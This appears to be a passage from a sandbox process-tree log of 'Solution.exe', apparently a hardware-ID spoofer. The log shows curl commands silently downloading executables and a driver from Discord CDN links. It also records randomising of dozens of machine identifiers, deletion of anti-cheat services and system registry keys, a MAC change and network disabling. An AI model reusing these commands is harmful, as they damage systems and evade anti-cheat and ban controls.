    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2956
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3676
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3296
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1704
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3484
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5000
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2904
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3220
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2104
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5112
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2588
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3604
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    - Modifies registry key
    PID:712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f >nul
  2⤵
  PID:4792
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f >nul
  2⤵
  PID:4072
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f >nul
  2⤵
  PID:2940
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f >nul
  2⤵
  PID:2040
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f >nul
  2⤵
  PID:4376
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f >nul
  2⤵
  PID:2336
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f >nul
  2⤵
  PID:1884
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f >nul
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f >nul
  2⤵
  PID:3692
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    - Modifies registry key
    PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f >nul
  2⤵
  PID:4192
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    - Modifies registry key
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f >nul
  2⤵
  PID:3948
- - C:\Windows\system32\reg.exe
    reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f >nul
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f >nul
  2⤵
  PID:524
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      PID:1500
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:3356
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:408
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:3720
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:1620
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v NetworkAddress /t REG_SZ /d C601DD284240 /f
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4016
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      PID:1204
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:3340
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:3856
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:4676
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v PnPCapabilities /t REG_DWORD /d 24 /f
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
    3⤵
    PID:3300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
      4⤵
      PID:1984
- - C:\Windows\system32\netsh.exe
    netsh interface set interface name="Ethernet" disable
    3⤵
    PID:2904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\Solution.exe
"C:\Users\Admin\AppData\Local\Temp\Solution.exe"
1⤵
PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color f
  2⤵
  PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  PID:1404
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
    3⤵
    - Drops file in Windows directory
    PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  PID:3128
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
    3⤵
    - Drops file in Windows directory
    PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  PID:4732
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
    3⤵
    - Drops file in Windows directory
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  PID:4180
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
    3⤵
    - Drops file in Windows directory
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2656
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
    3⤵
    - Drops file in Windows directory
    PID:3688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:4024
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 29359 /f
    3⤵
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:3648
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 29359 /f
    3⤵
    PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3336
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    - Modifies registry key
    PID:4048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2244
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3028
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1360
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2935929608-184784472-1471327788} /f
    3⤵
    PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:776
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2680
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5068
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2668
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2132
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:460
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5052
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2264
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    - Modifies registry key
    PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:536
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2236
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2935929608-184784472-1471327788 /f
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2368
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Enumerates system info in registry
    PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3836
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    - Modifies registry key
    PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4088
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3508
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3004
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3024
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3044
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2684
- C:\Windows\system32\cmd.exe
